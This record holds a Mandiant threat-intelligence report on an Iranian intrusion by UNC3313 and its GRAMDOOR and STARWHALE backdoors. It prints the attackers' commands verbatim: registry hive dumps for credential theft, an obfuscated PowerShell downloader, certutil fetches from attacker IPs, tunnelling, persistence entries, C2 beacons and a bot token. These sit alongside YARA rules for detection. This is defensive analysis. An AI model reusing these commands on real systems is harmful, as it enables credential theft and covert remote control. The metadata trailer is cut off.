{
	"id": "b7b06d61-ada4-477f-a02f-bf39f2cbf6d9",
	"created_at": "2026-04-06T00:08:42.016101Z",
	"updated_at": "2026-04-10T03:34:22.737997Z",
	"deleted_at": null,
	"sha1_hash": "503a49981eb14d6378dffa21a0e92728d7e069c2",
	"title": "Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 942977,
	"plain_text": "Left On Read: Telegram Malware Spotted in Latest Iranian Cyber\r\nEspionage Activity | Mandiant\r\nBy Mandiant\r\nPublished: 2022-02-24 · Archived: 2026-04-05 19:46:44 UTC\r\nWritten by: Ryan Tomcik, Emiel Haeghebaert, Tufail Ahmed\r\nIn November 2021, Mandiant Managed Defense detected and responded to an UNC3313 intrusion at a Middle\r\nEast government customer. During the investigation, Mandiant identified new targeted malware, GRAMDOOR\r\nand STARWHALE, which implement simple backdoor functionalities. We also identified UNC3313 use publicly\r\navailable remote access software to maintain access to the environment. UNC3313 initially gained access to this\r\norganization through a targeted phishing email and leveraged modified, open-source offensive security tools to\r\nidentify accessible systems and move laterally. UNC3313 moved rapidly to establish remote access by using\r\nScreenConnect to infiltrate systems within an hour of initial compromise. Through the rapid coordination of\r\nMandiant Managed Defense and our customer’s security team, the incident was quickly contained and remediated.\r\nMandiant assesses with moderate confidence that UNC3313 conducts surveillance and collects strategic\r\ninformation to support Iranian interests and decision-making. 
Targeting patterns and related lures demonstrate a\r\nstrong focus on targets with a geopolitical nexus.\r\nThis blog post covers the details of an intrusion conducted by UNC3313, along with malware and publicly\r\navailable tools that were identified during our investigation.\r\nAttribution\r\nMandiant uses the label “UNC” groups—or “uncategorized” groups—to refer to a cluster of intrusion activity that\r\nincludes observable artifacts such as adversary infrastructure, tools, and tradecraft that we are not yet ready to give\r\na classification such as TEMP, APT, or FIN (learn more about how Mandiant tracks uncategorized threat actors).\r\nMandiant assesses with moderate confidence that UNC3313 is associated with TEMP.Zagros (reported in open\r\nsources as MuddyWater), an Iran-nexus threat actor active since at least May 2017, based on currently available\r\ninformation. TEMP.Zagros has consistently updated their toolkit over the years, using malware such as\r\nPOWERSTATS, POWGOOP, and MORIAGENT in spear-phishing operations. The group’s use of ScreenConnect\r\nfor initial compromise is well documented in open sources.\r\nNotably, on January 12, 2022, the U.S. government publicly stated it considers TEMP.Zagros as subordinate to the\r\nIranian Ministry of Intelligence and Security (MOIS) and disclosed samples of malware families (POWGOOP and\r\nMORIAGENT) in use by the group since at least 2020.\r\nTargeting\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 1 of 16\n\nIn the second half of 2021, Mandiant identified an UNC3313 campaign using GRAMDOOR and STARWHALE\r\nto target Middle Eastern government and technology entities. TEMP.Zagros has historically targeted these regions\r\nand sectors throughout the Middle East and Central and South Asia, including government, defense,\r\ntelecommunications, energy, and finance. 
Targeting patterns and related lures demonstrate a strong focus on\r\ntargets with a geopolitical nexus and the telecommunications sector in the Middle East.\r\nMalware Observed\r\nMandiant observed UNC3313 deploy the following malware families.\r\nMalware Family Description\r\nGRAMDOOR\r\nGRAMDOOR is a backdoor written in Python that uses the Telegram Bot API to\r\ncommunicate over HTTP with the Telegram server. Supported commands include\r\ncommand execution via cmd.exe.\r\nSTARWHALE\r\nSTARWHALE is a Windows Script File (WSF) backdoor that communicates via\r\nHTTP. Supported commands include shell command execution and system\r\ninformation collection.\r\nSTARWHALE.GO\r\nSTARWHALE.GO is a backdoor written in GO programming language that\r\ncommunicates via HTTP. The backdoor can execute shell commands and collect\r\nsystem information, such as local IP address, computer name, and username.\r\nCRACKMAPEXEC\r\nCRACKMAPEXEC is a post-exploitation tool that helps automate assessing the\r\nsecurity of large Active Directory networks.\r\nTable 1: UNC3313 Malware Families\r\nOutlook and Implications\r\nThe use of the Telegram API for command and control allows for malicious traffic to blend in with legitimate user\r\nbehavior. Combined with the use of legitimate remote access software, publicly available tools such as LIGOLO\r\nand CrackMapExec, and the multi-layer encoding routine, Mandiant believes this reflects TEMP.Zagros' efforts to\r\nevade detection and security features. Meanwhile, it is unclear how the U.S. government's recent public attribution\r\nof \"MuddyWater\" to the Iranian Ministry of Intelligence and Security will affect the group's operations. 
It is\r\nplausible the group may re-tool and shift their tactics, techniques, and procedures prior to conducting additional\r\noperations.\r\nUNC3313 Attack Lifecycle\r\nEstablish Foothold\r\nUNC3313 initially gained access to the customer’s environment through a spear-phishing attack that compromised\r\nmultiple systems. Phishing emails were crafted with a job promotion lure and tricked multiple victims to click a\r\nURL to download a RAR archive file hosted at the cloud storage service OneHub. This pattern is consistent with\r\nobservations in open-source reporting by Anomali and Trend Micro.\r\nThe RAR archives contained a Windows Installer .msi file that installed ScreenConnect remote access software to\r\nestablish a foothold. Figure 1 shows a Windows Installer transaction event recorded in the Windows Application\r\nlogs for the execution of performance.msi.\r\nLog: Application\r\nSource: MsiInstaller\r\nEID: 1040\r\nMessage: Beginning a Windows Installer transaction: C:\\Users\\\u003credacted\u003e\\AppData\\Local\\Temp\\Rar$EXb7468.17680\\per\r\nFigure 1: Windows Installer transaction event for performance.msi\r\nAs mentioned, UNC3313 moved rapidly to establish remote access through ScreenConnect to infiltrate systems\r\nwithin an hour of initial compromise. ScreenConnect provides the capability to issue single CLI commands to the\r\nclient or to open a full terminal using Backstage Mode. 
Mandiant observed command execution using cmd.exe\r\nand powershell.exe by the parent process ScreenConnect.ClientService.exe.\r\nLog: Application\r\nSource: ScreenConnect Client (f494f7a48b0cd497)\r\nEID: 0\r\nMessage: Cloud Account Administrator Connected-++-\r\nLog: Application\r\nSource: ScreenConnect Client (f494f7a48b0cd497)\r\nEID: 0\r\nMessage: Cloud Account Administrator Disconnected-++-\r\n \r\nLog: Application\r\nSource: ScreenConnect Client (f494f7a48b0cd497)\r\nEID: 0\r\nMessage: Executed command of length: 13-++-\r\nFigure 2: ScreenConnect client connection and command execution event logs\r\nWhen actively running, the ScreenConnect.ClientService.exe process performed DNS lookups for a\r\nScreenConnect relay service at instance-\u003c6 character alphanumeric id\u003e-relay.screenconnect.com. Mandiant\r\nobserved the process ScreenConnect.WindowsClient.exe write additional attacker tools to the initially\r\ncompromised hosts, indicating the files were copied through the active ScreenConnect session.\r\nFile Write Event\r\nFull Path: C:\\ProgramData\\ligo64.exe\r\nSize: 3474432\r\nMD5: 7fefce7f2e4088ce396fd146a7951871\r\nProcess: ScreenConnect.WindowsClient.exe\r\nProcess Path: C:\\Program Files (x86)\\ScreenConnect Client (f494f7a48b0cd497)\r\nParent Process Path: C:\\Program Files (x86)\\ScreenConnect Client (f494f7a48b0cd497)\\ScreenConnect.ClientService.\r\nFigure 3: File write event by the ScreenConnect Windows Client process\r\nEscalate Privileges\r\nMandiant observed UNC3313 use common credential-dumping techniques using legitimate Windows utilities.\r\nUNC3313 leveraged the open-source WMIEXEC.PY attack framework to execute reg commands to export copies\r\nof the local SAM, SYSTEM, and SECURITY Windows registry hives. 
WMIEXEC.PY enables simple command\r\ninvocation on a remote system (with admin rights and DCOM ports accessible on target system) via WMI\r\n(Windows Management Instrumentation).\r\ncmd.exe /Q /c reg save HKLM\\SAM C:\\users\\public\\sam 1\u003e \\\\127.0.0.1\\ADMIN$\\__1637143994.2306612 2\u003e\u00261\r\ncmd.exe /Q /c reg save HKLM\\SYSTEM C:\\users\\public\\system 1\u003e \\\\127.0.0.1\\ADMIN$\\__1637143994.2306612 2\u003e\u00261\r\ncmd.exe /Q /c reg save HKLM\\SECURITY C:\\users\\public\\security 1\u003e \\\\127.0.0.1\\ADMIN$\\__1637143994.2306612 2\u003e\u00261\r\nFigure 4: Suspicious Registry exports executed by WMIEXEC.PY\r\nUNC3313 used the Task Manager application to dump the process memory of lsass.exe, as shown in Figure 5\r\nwhen the process Taskmgr.exe wrote the file lsass.dmp.\r\nFile Write Event\r\nFull Path: C:\\Users\\\u003credacted\u003e\\AppData\\Local\\Temp\\2\\lsass.DMP\r\nSize: 59378917\r\nProcess: Taskmgr.exe\r\nProcess Path: C:\\Windows\\System32\r\nParent Process Path: C:\\Windows\\explorer.exe\r\nFigure 5: Task Manager Dump of LSASS.EXE\r\nInternal Reconnaissance and Lateral Movement\r\nMandiant observed UNC3313 leverage publicly available offensive security tools to accomplish remote command\r\nexecution, internal reconnaissance, network tunneling, and lateral movement. UNC3313 used a slightly modified\r\nversion of the open-source pen-testing tool CrackMapExec v3.0 (CRACKMAPEXEC) compiled with Pyinstaller\r\nto perform system enumeration and user account reconnaissance and to execute remote commands on target\r\nsystems. 
The modified version of CRACKMAPEXEC used by the attacker, named aa.exe, had the tool’s\r\ndescription removed and included the database setup code from the utility setup_database.py to bypass extra\r\ninstallation steps (Figure 6).\r\nFigure 6: Modified CRACKMAPEXEC with inclusion of setup_database.py code\r\nUNC3313 performed initial reconnaissance and account access testing with CRACKMAPEXEC using the\r\ncommands shown in Figure 7 and Figure 8. The credential and host information collected by CRACKMAPEXEC\r\nwere stored in the local database file cme.db.\r\naa.exe 10.20.11.1/24\r\nFigure 7: Initial execution of compiled CRACKMAPEXEC\r\naa.exe 10.20.11.1/24 -u -p --local-auth\r\nFigure 8: Local Administrator access testing with CRACKMAPEXEC\r\nUNC3313 used CRACKMAPEXEC to run the Windows utility certutil and obfuscated PowerShell commands to\r\ndownload additional tools and payloads on remote systems.\r\naa.exe 10.20.11.11 -u \u003clocal admin\u003e -p \u003cpassword\u003e --local-auth -x \"powershell -exec bypass\r\n\"function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i\r\n-lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt =\r\n[System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;};IEX (decode\r\n'J3QjPiNYUHpwd2ZuLU1mdy1Ld3dzVGZhUWZydmZwd145OUBxZmJ3Ziska3d3czksLDc2LTI3M\r\nS0xMjEtNTI5OzMsZGZGcVNrdzVgWWgwZXJkMzNlS0xtaWA6SDJbW2FvQVskKjgndC1zcWx7ei\r\nM+I1hNZnctVGZhUWZydmZwd145OURmd1B6cHdmblRmYVNxbHt6Kyo4J0Z7ZmB2d2psbUBs\r\nbXdme3ctSm11bGhmQGxubmJtZy1KbXVsaGZQYHFqc3crK01mdC5MYWlmYHcjUHpwd2ZuLU\r\npMLVB3cWZiblFmYmdmcSsndC1EZndRZnBzbG1wZisqLURmd1FmcHNsbXBmUHdxZmJuKyoqK\r\ni1RZmJnV2xGbWcrKio4' 3);\"\r\nFigure 9: Execution of obfuscated PowerShell downloader\r\nThe obfuscated PowerShell downloader used base64 encoding and simple XOR encryption that decoded to the\r\ngeneral command syntax shown in Figure 
10.\r\n$w = [System.Net.HttpWebRequest]::Create('http[:]// 45.142.212[.]61:80/geErPht6cZk3fqg00fHOnjc9K1XXblBX');\r\n$w.proxy = [Net.WebRequest]::GetSystemWebProxy();\r\n$ExecutionContext.InvokeCommand.InvokeScript((New-Object System.IO.StreamReader($w.GetResponse().GetResponseStre\r\nFigure 10: Deobfuscated PowerShell command\r\nUNC3313 used the multi-platform LIGOLO tunneler utility to establish tunneled access into our customer’s\r\nenvironment. LIGOLO is an open-source, encrypted reverse SOCKS5 or TCP tunneler written in GO. The\r\nLIGOLO utility was executed with the command-line argument “-s3” to specify the relay server instead of the\r\ndocumented argument “-relayserver”, which indicates modification of the original code downloaded from the\r\nGitHub repository.\r\naa.exe 10.20.11.11 -u -p --local-auth -x \"certutil.exe -urlcache -split -f http[:]//95.181.161[.]81:443/l.exe C\r\nFigure 11: Remote execution of certutil to download LIGOLO tunneler via CRACKMAPEXEC\r\nc:\\programdata\\ligo64.exe -s3 95.181.161[.]81:5555\r\nFigure 12: Execution of LIGOLO tunneler utility with relay server\r\nMandiant observed the hostname DESKTOP-5EN5P2I in Windows logon events on systems that were accessed\r\nby UNC3313 through an RDP connection tunneled using LIGOLO.\r\nLog: Security\r\nEID: 4624\r\nNetwork Information:\r\nWorkstation Name: DESKTOP-5EN5P2I\r\nSource Network Address: -\r\nSource Port: -\r\nLog: Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational\r\nEID: 1149\r\nUser:\r\nDomain: DESKTOP-5EN5P2I\r\nSource Network Address: 10.20.11.14\r\nFigure 13: Windows logon events showing evidence of RDP session tunneling via LIGOLO\r\nMaintain Persistence\r\nMandiant identified a new malware family named STARWHALE that was used by UNC3313. 
STARWHALE is a\r\nWindows Script File backdoor that simply receives commands from a command and control (C2) server via HTTP\r\nand executes those commands via Windows cmd.exe. On the infected system, STARWHALE was observed being\r\nexecuted with a command-line argument as shown in Figure 14.\r\ncmd.exe /c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback__whale\r\nFigure 14: STARWHALE execution\r\nFigure 15: STARWHALE Code Snippet\r\nThe command line argument \"humpback__whale \" is used in the code to dynamically resolve functions at runtime\r\nusing the VBScript function GetRef. Since STARWHALE does not contain any persistence mechanism, a service\r\nis created as shown in Figure 16.\r\nsc create Windowscarpstss binpath= \"cmd.exe /c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback__whale\" sta\r\nFigure 16: STARWHALE Persistence Method\r\nSTARWHALE communicates with its C2 server, which is hardcoded in the malware. Upon first execution, the\r\nmalware gathers basic user and system information, such as local IP address, computer name, and username. 
It\r\nthen encodes this information using a custom encoding scheme before sending the information to the C2 IP\r\naddress as shown in Figure 17.\r\nPOST /jznkmustntblvmdvgcwbvqb HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded; Charset=UTF-8\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nCharSet: UTF-8\r\nContent-Length: 69\r\nHost: 5.199.133[.]149\r\nvl=27732737231435E335F4239537109C22531327535C22D1327235E46253E2215613\r\nFigure 17: STARWHALE Beacon\r\nThe hex value passed via the POST request parameter “vl=”, as shown in Figure 17, can be decoded to the\r\nfollowing system enumeration information, piped together and separated with a delimiter:\r\n|delimiter|\\\\\u003cusername\u003e\r\nThe delimiter in the samples observed was “|!)!)!|”. It then expects its C2 server to return a string value that is\r\nencoded using the same scheme. This string value is then included in all subsequent POST requests. If\r\nSTARWHALE’s initial request is successful, it begins sending the session key in a loop via HTTP POST requests\r\nto its C2 server at hxxp://5.199.133[.]149/oeajgyxyxclqmfqayv. The C2 server will then respond with a command\r\nmeant to be executed via cmd.exe, as shown in Figure 18.\r\ncmd.exe /c \u003ccommand\u003e \u003e\u003e %temp%\\stari.txt.\r\nFigure 18: STARWHALE command execution process\r\nThe output of the command is written to a file called “stari.txt.” It then encodes the output using the custom\r\nscheme and sends it back to the C2 server in its next POST request. The structure is similar to what is shown in\r\nFigure 19.\r\n\u003cc2_session_key\u003e|!)!)!|\u003ccommand_output\u003e\r\nFigure 19: STARWHALE information sent to C2\r\nIf the command fails, it sends the encoded string \"SoRRy\" to its C2. 
Notably, in earlier iterations of\r\nSTARWHALE, Mandiant also observed it using the string \"sory\" [sic]. The threat actor corrected the spelling\r\nerror after security researchers highlighted the string in a public forum. Mandiant has observed similar spelling\r\nerrors in other campaigns by Iranian threat actors.\r\nDuring the intrusion, Mandiant also observed the actors deploying a malware that shares a lot of similarities with\r\nSTARWHALE in design but written in Golang. Mandiant is calling this code family STARWHALE.GO. It is\r\ndownloaded on the system using the certutil.exe utility as shown in Figure 20.\r\ncertutil.exe -urlcache -split -f hxxp://95.181.161[.]81:443/per_indexx.exe\r\nFigure 20: STARWHALE.GO download\r\nSTARWHALE.GO arrives as part of a Nullsoft Scriptable Install System (NSIS) installer, which installs it in a\r\ndirectory called OutlookM and creates a Run key in Windows registry to make it persistent on the system. Upon\r\nexecution, it drops the Golang binary and executes it.\r\nInstType $(LSTR_37) ; Custom\r\nInstallDir $LOCALAPPDATA\\OutlookM\r\n; install_directory_auto_append = OutlookM\r\n; wininit = $WINDIR\\wininit.ini\r\n; --------------------\r\n; SECTIONS: 1\r\n; COMMANDS: 6\r\nSection ; Section_0\r\n ; AddSize 4744\r\n CreateDirectory $INSTDIR\r\n SetOutPath $INSTDIR\r\n File index.exe\r\n Exec $INSTDIR\\index.exe\r\n WriteRegStr HKCU SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run OutlookM $INSTDIR\\index.exe\r\nSectionEnd\r\nFigure 21: NSIS Script Snippet for STARWHALE.GO\r\nThe following registry key is created as a result of running the NSIS executable.\r\nKEY: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM\r\nValue: C:\\Users\\\u003credacted\u003e\\AppData\\Local\\OutlookM\\index.exe\r\nFigure 22: STARWHALE.GO Persistence Method\r\nSTARWHALE.GO also uses a custom data encoding algorithm to protect its network 
communication and critical\r\nstrings within the binary. It sends the same information as STARWHALE, but the data sent and received are a\r\nJSON object. A sample HTTP POST request is shown in Figure 23.\r\nPOST /nnskfepmasiiohvijcdpxtxzjv HTTP/1.1\r\nHost: 87.236.212[.]184\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 91\r\nContent-Type: application/json\r\nAccept-Encoding: gzip\r\n{\"vl\":\"2179526e3176587ec7557e4192495c46264556569c47693e8d39415432445722222733323323332333\"}\r\nFigure 23: STARWHALE.GO HTTP C2 beacon\r\nSTARWHALE.GO uses a different delimiter “|\u0026\u0026%\u0026\u0026|” than STARWHALE, but the rest of the enumerated\r\ninformation sent to the hardcoded C2 IP address is the same. Similarly, the malware reads the response from the\r\nPOST request to the C2 server and attempts to decode it using the same custom string transformation routine it\r\nused to encode the data it sent. This routine is simpler than that used by STARWHALE, as explained later. The\r\ndecoded result is either launched as a command line with the process \"cmd.exe /c\" or launched directly as a\r\nprocess if the string ends with .com, .exe, .bat, or .cmd. The output of the launched process, or error message in\r\nthe case of a failure to decode the string, is sent to the C2 server via HTTP POST requests to its C2 server at\r\nhxxp://87.236.212[.]184/cepopggawztuxkxujfjbnpv.\r\nMandiant identified a third UNC3313 backdoor during the investigation that was compiled with Python 3.9 and\r\npackaged via PyInstaller, which would only execute on Windows 8 and higher. Mandiant has named this backdoor\r\nGRAMDOOR due to its ability to use the Telegram Bot API for communication. It sends and receives messages\r\nfrom an actor-created Telegram chat room. 
GRAMDOOR arrives on the system packaged as an NSIS installer,\r\nwhich establishes a persistence mechanism by setting the Windows Run registry key, as shown in Figure 24.\r\nKEY: HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift\r\nValue: C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\OutlookMicrosift\\index.exe\" Platypus\r\nFigure 24: GRAMDOOR Persistence Method\r\nThe NSIS installer for GRAMDOOR drops the PyInstaller packaged binary in the APPDATA directory in a\r\nsubdirectory named OutlookMicrosift. It is executed using Exec command from the install directory, as shown in\r\nFigure 25.\r\nInstType $(LSTR_37) ; Custom\r\nInstallDir $APPDATA\\OutlookMicrosift\r\n; install_directory_auto_append = OutlookMicrosift\r\n; wininit = $WINDIR\\wininit.ini\r\n; --------------------\r\n; SECTIONS: 1\r\n; COMMANDS: 6\r\nSection ; Section_0\r\n ; AddSize 16859\r\n CreateDirectory $INSTDIR\r\n SetOutPath $INSTDIR\r\n File index.exe\r\n Exec \"$INSTDIR\\index.exe Platypus\"\r\n WriteRegStr HKCU SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run OutlookMicrosift \"$\\\"$INSTDIR\\index.exe$\\\" Plat\r\nSectionEnd\r\nFigure 25: NSIS Script Snippet for GRAMDOOR\r\nGRAMDOOR expects to be launched with one command-line parameter, which in this case was \"Platypus.\" It\r\nuses this command-line parameter to piece together the function name, which is then called and acts as the entry\r\npoint to the malware. GRAMDOOR implements only two commands: start and com. These commands are used to\r\nlaunch a cmd.exe process to which commands are piped. All network communication is via the Telegram server\r\nat api.telegram[.]org. This allows the actors to disguise their communication as regular Telegram traffic. 
This\r\ntechnique is not novel, and it is not the first time Iranian actors abused publicly available software to make their\r\nC2 traffic blend in.\r\nAll HTTP requests from the malware to the Telegram server contained the token string\r\n2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY. The token strings are used to authenticate to the bot.\r\nFigure 26 shows a sample request.\r\nhxxps://api.telegram[.]org/bot2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY/sendMessage?\r\nchat_id=\u003cchat_id\u003e\u0026parse_mode=Markdown\u0026text=\u003ccontent\u003e\r\nFigure 26: GRAMDOOR Sample Request\r\nThe malware uses the sendMessage API function to send information to a chat ID number. The actors interact\r\nwith the host via the chat by issuing commands and then getting output of the executed commands sent back in the\r\nchat. For example, to retrieve network configuration information from the infected host, the attacker would issue\r\nthe command “com\u003cid\u003e c607666261766066f9f23ec696” where the value “c607666261766066f9f23ec696” is\r\ntranslated to “ipconfig /all” command.\r\nSTARWHALE and GRAMDOOR share similarities in logic for the custom encoding scheme used for the data and\r\ncommands sent to and received from the C2. 
The following code snippet demonstrates STARWHALE’s traffic\r\nencoding and decoding and GRAMDOOR’s commands passed back and forth between Telegram chat messages.\r\ndef transform_chars(data):\r\n data = list(data)\r\n src = 0\r\n dst = len(data) - 1\r\n while src \u003c dst:\r\n  t = data[src]\r\n  data[src] = data[dst]\r\n  data[dst] = t\r\n  src += 3\r\n  dst -= 2\r\n return ''.join(data)\r\ndef decode_traffic(data):\r\n return bytes.fromhex(transform_chars(transform_chars(data)[::-1])).decode('utf')\r\ndef encode_traffic(data):\r\n return transform_chars(transform_chars(data.encode('utf').hex())[::-1])\r\nFigure 27: Encoding/Decoding custom routine example code snippet\r\nGRAMDOOR also hides sensitive strings within its code using a custom XOR-based encryption scheme. The\r\nfollowing sample code shows the logic of the aforementioned scheme.\r\ndef xor_transform(data):\r\n key = '`qLd' + str(5) + 'Hm^yw/sG-qh\u0026@~y|[dJmC' + str(6) + 'UFvNt-^^_FeSd' + str(4) + 'N*#GNophwQ-MCJ' + str\r\n return ''.join((lambda .0: [ chr(ord(c1) ^ ord(c2)) for c1, c2 in .0 ])(zip(data, key)))\r\n \r\ndef encode_str(data):\r\n return base64.b64encode(xor_transform(data).encode())\r\ndef decode_str(data):\r\n return xor_transform(base64.b64decode(data).decode())\r\nFigure 28: Sample snippet showing XOR-based encryption scheme used in GRAMDOOR\r\nMandiant also observed UNC3313 store PowerShell downloader commands in Registry keys that were referenced\r\nby a Scheduled Task named “Oracle scheduled assistant Autoupdate” that is triggered on user logon.\r\nPath: HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Oracle\\Pre\r\nType: REG_SZ\r\nValue Name: Pre\r\nText: IEX\r\nFigure 29: PowerShell command stored in Registry Value “Pre”\r\nPath: HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Oracle\\Post\r\nType: REG_SZ\r\nValue Name: Post\r\nText: function decode($txt,$key){$enByte = 
[System.Convert]::FromBase64String($txt);\r\nfor($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF\r\n$o.proxy = [Net.WebRequest]::GetSystemWebProxy();$ExecutionContext.InvokeCommand.InvokeScript((decode (New-Objec\r\nFigure 30: PowerShell command stored in Registry Value “Post”\r\nLastly, Mandiant observed UNC3313 download and execute a Windows Installer file for the eHorus remote access\r\ntool from the vendor website. UNC3313 executed the file ehorus_installer_windows-1.1.3-x64_en-US.msi, which\r\ncreated a service named EHORUSAGENT. The eHorus agent process ehorus_agent.exe communicates with\r\ndomains hosted on ehorus[.]com.\r\nLog: System\r\nSource: Service Control Manager\r\nEID: 7045\r\nService Name: eHorus Agent Launcher\r\nService File Name: \"C:\\Program Files\\ehorus_agent\\ehorus_launcher.exe\" -s\r\nFigure 31: Service installation for eHorus agent\r\neHorus is a legitimate remote access tool advertised commercially by Pandora FMS, which is based in Spain.\r\neHorus has been recently reported by Symantec being abused by Iranian threat actors in a similar campaign\r\nagainst telecom organizations in the Middle East and Asia.\r\nMandiant Targeted Attack Lifecycle\r\nLearn more about the Mandiant Targeted Attack Lifecycle.\r\nFigure 32: Mandiant Targeted Attack Lifecycle\r\nMITRE ATT\u0026CK Techniques\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA102-562 Command and Control - GRAMDOOR, DNS Query, Variant #1\r\nA102-563 Malicious File Transfer - GRAMDOOR, Download, Variant #1\r\nA102-564 Malicious File Transfer - GRAMDOOR, Download, Variant #2\r\nA102-565 Malicious File Transfer - STARWHALE, Download, Variant #1\r\nA102-566 Malicious File Transfer - STARWHALE, 
Download, Variant #2\r\nA102-567 Malicious File Transfer - STARWHALE, Download, Variant #3\r\nA102-568 Malicious File Transfer - STARWHALE.GO, Download, Variant #1\r\nA104-975 Protected Theater - GRAMDOOR, Execution, Variant #1\r\nA104-976 Protected Theater - STARWHALE, Execution, Variant #1\r\nA104-977 Host CLI - GRAMDOOR, Registry Persistence, Variant #1\r\nA104-978 Host CLI - STARWHALE, Service Persistence, Variant #1\r\nYARA Rules\r\nrule M_Hunting_Backdoor_STARWHALE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects strings for STARWHALE samples\"\r\n md5 = \" cb84c6b5816504c993c33360aeec4705\"\r\n rev = 1\r\n strings:\r\n $s1 = \"JSCript\" ascii nocase wide\r\n $s2 = \"VBSCript\" ascii nocase wide\r\n $s3 = \"WScript.Shell\" ascii nocase wide\r\n $s4 = \"ok\" ascii nocase wide\r\n $s5 = \"no\" ascii nocase wide\r\n $s6 = \"stari.txt\" ascii nocase wide\r\n $s7 = \"SoRRy\" ascii wide\r\n $s8 = \"EMIP\" ascii wide\r\n $s9 = \"NIp\" ascii wide\r\n $s10 = \"401\" ascii wide\r\n $s11 = \"_!#\" ascii wide\r\n $s12 = \"/!\u0026^^\u0026!/\" ascii wide\r\n $s13 = \"|!)!)!|\" ascii wide\r\n $s14 = \"|#@*@#|\" ascii wide\r\n $s15 = \"/!*##*!/\" ascii wide\r\n $s16 = \"sory\" ascii nocase wide\r\n condition:\r\n filesize \u003e 5KB and filesize \u003c 5MB and 10 of ($s*)\r\n}\r\nrule M_Hunting_Backdoor_STARWHALE_GO_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects strings for STARWHALE.GO\"\r\n strings:\r\n $main1 = \"main.findExecutable\" ascii\r\n $main2 = \"main.showMatrixElements\" ascii\r\n $delim = \"|\u0026\u0026%\u0026\u0026|\" ascii\r\n $matrix = \"MATRIX1*MATRIX2\" ascii\r\n $sample = \"1522526f4260f4653664276774\" ascii\r\n \r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize \u003c 15MB and 4 of 
them\r\n}\r\nIndicators of Compromise\r\nAcknowledgements\r\nSpecial thanks to Mike Hunoff, Nick Harbour, and Muhammad Umair for their assistance with reverse\r\nengineering the malware discussed in this blog post, and Adrien Bataille and Ervin James Ocampo for creating\r\ndetections for malware families. Additionally, we would also like to thank Dan Andreiana, Alexander Pennino,\r\nNick Richards, Jake Nicastro, Sarah Jones, and Geoff Ackerman for their help with technical review and\r\nproviding valuable feedback.\r\nSource: https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.mandiant.com/resources/telegram-malware-iranian-espionage"
	],
	"report_names": [
		"telegram-malware-iranian-espionage"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
